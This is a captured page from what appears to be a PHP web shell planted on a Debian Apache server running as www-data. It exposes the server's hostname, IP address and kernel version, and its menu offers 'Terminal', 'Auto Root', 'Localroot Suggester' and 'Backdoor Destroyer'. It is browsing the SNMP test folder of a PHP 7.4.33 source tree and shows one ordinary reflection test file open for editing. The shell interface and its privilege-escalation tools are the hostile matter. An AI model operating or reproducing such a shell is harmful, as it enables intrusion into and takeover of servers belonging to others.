Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
snmp /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
README.md
1.62
KB
-rw-rw-r--
2022-10-31 11:36
bigtest
141
B
-rwxrwxr-x
2022-10-31 11:36
bug60749.phpt
666
B
-rw-rw-r--
2022-10-31 11:36
bug64124.phpt
1003
B
-rw-rw-r--
2022-10-31 11:36
bug64159.phpt
502
B
-rw-rw-r--
2022-10-31 11:36
bug72479.phpt
738
B
-rw-rw-r--
2022-10-31 11:36
clean.inc
94
B
-rw-rw-r--
2022-10-31 11:36
generic_timeout_error.phpt
651
B
-rw-rw-r--
2022-10-31 11:36
ipv6.phpt
662
B
-rw-rw-r--
2022-10-31 11:36
reflection.phpt
2.34
KB
-rw-rw-r--
2022-10-31 11:36
skipif.inc
459
B
-rw-rw-r--
2022-10-31 11:36
snmp-object-errno-errstr.phpt
5.02
KB
-rw-rw-r--
2022-10-31 11:36
snmp-object-error.phpt
3.31
KB
-rw-rw-r--
2022-10-31 11:36
snmp-object-properties.phpt
3.81
KB
-rw-rw-r--
2022-10-31 11:36
snmp-object-setSecurity_error.phpt
2.32
KB
-rw-rw-r--
2022-10-31 11:36
snmp-object.phpt
6.96
KB
-rw-rw-r--
2022-10-31 11:36
snmp2_get.phpt
3.1
KB
-rw-rw-r--
2022-10-31 11:36
snmp2_getnext.phpt
870
B
-rw-rw-r--
2022-10-31 11:36
snmp2_real_walk.phpt
2.5
KB
-rw-rw-r--
2022-10-31 11:36
snmp2_set-nomib.phpt
1.52
KB
-rw-rw-r--
2022-10-31 11:36
snmp2_set.phpt
10
KB
-rw-rw-r--
2022-10-31 11:36
snmp2_walk.phpt
2.78
KB
-rw-rw-r--
2022-10-31 11:36
snmp3-error.phpt
3.3
KB
-rw-rw-r--
2022-10-31 11:36
snmp3.phpt
3.89
KB
-rw-rw-r--
2022-10-31 11:36
snmp_get_quick_print.phpt
925
B
-rw-rw-r--
2022-10-31 11:36
snmp_get_valueretrieval.phpt
1.56
KB
-rw-rw-r--
2022-10-31 11:36
snmp_getvalue.phpt
2.38
KB
-rw-rw-r--
2022-10-31 11:36
snmp_include.inc
1.1
KB
-rw-rw-r--
2022-10-31 11:36
snmp_read_mib.phpt
814
B
-rw-rw-r--
2022-10-31 11:36
snmp_set_enum_print.phpt
628
B
-rw-rw-r--
2022-10-31 11:36
snmp_set_oid_output_format.phpt
862
B
-rw-rw-r--
2022-10-31 11:36
snmpd.conf
744
B
-rw-rw-r--
2022-10-31 11:36
snmpget.phpt
3.23
KB
-rw-rw-r--
2022-10-31 11:36
snmpgetnext.phpt
862
B
-rw-rw-r--
2022-10-31 11:36
snmprealwalk.phpt
2.43
KB
-rw-rw-r--
2022-10-31 11:36
snmpset-nomib.phpt
1.51
KB
-rw-rw-r--
2022-10-31 11:36
snmpset.phpt
10.01
KB
-rw-rw-r--
2022-10-31 11:36
snmpwalk.phpt
2.73
KB
-rw-rw-r--
2022-10-31 11:36
wrong_hostname.phpt
459
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Test SNMP Reflection --SKIPIF-- <?php if (!extension_loaded('snmp')) die ("skip no snmp extension"); ?> --FILE-- <?php /* ALL PHP_ME user callable methods of SNMP class should appear here */ echo new reflectionmethod('snmp', '__construct'); echo new reflectionmethod('snmp', 'close'); echo new reflectionmethod('snmp', 'setSecurity'); echo new reflectionmethod('snmp', 'get'); echo new reflectionmethod('snmp', 'getnext'); echo new reflectionmethod('snmp', 'walk'); echo new reflectionmethod('snmp', 'set'); echo new reflectionmethod('snmp', 'getErrno'); echo new reflectionmethod('snmp', 'getError'); ?> ===DONE=== <?php exit(0); ?> --EXPECT-- Method [ <internal:snmp, ctor> public method __construct ] { - Parameters [5] { Parameter #0 [ <required> $version ] Parameter #1 [ <required> $host ] Parameter #2 [ <required> $community ] Parameter #3 [ <optional> $timeout ] Parameter #4 [ <optional> $retries ] } } Method [ <internal:snmp> public method close ] { - Parameters [0] { } } Method [ <internal:snmp> public method setSecurity ] { - Parameters [7] { Parameter #0 [ <required> $sec_level ] Parameter #1 [ <required> $auth_protocol ] Parameter #2 [ <required> $auth_passphrase ] Parameter #3 [ <required> $priv_protocol ] Parameter #4 [ <required> $priv_passphrase ] Parameter #5 [ <required> $contextName ] Parameter #6 [ <required> $contextEngineID ] } } Method [ <internal:snmp> public method get ] { - Parameters [2] { Parameter #0 [ <required> $object_id ] Parameter #1 [ <optional> $use_orignames ] } } Method [ <internal:snmp> public method getnext ] { - Parameters [2] { Parameter #0 [ <required> $object_id ] Parameter #1 [ <optional> $use_orignames ] } } Method [ <internal:snmp> public method walk ] { - Parameters [4] { Parameter #0 [ <required> $object_id ] Parameter #1 [ <required> $suffix_keys ] Parameter #2 [ <required> $max_repetitions ] Parameter #3 [ <required> $non_repeaters ] } } Method [ <internal:snmp> public method set ] { - Parameters [3] { Parameter #0 [ <required> $object_id ] Parameter #1 [ <required> $type ] Parameter #2 [ <required> $value ] } } Method [ <internal:snmp> public method getErrno ] { - Parameters [0] { } } Method [ <internal:snmp> public method getError ] { - Parameters [0] { } } ===DONE===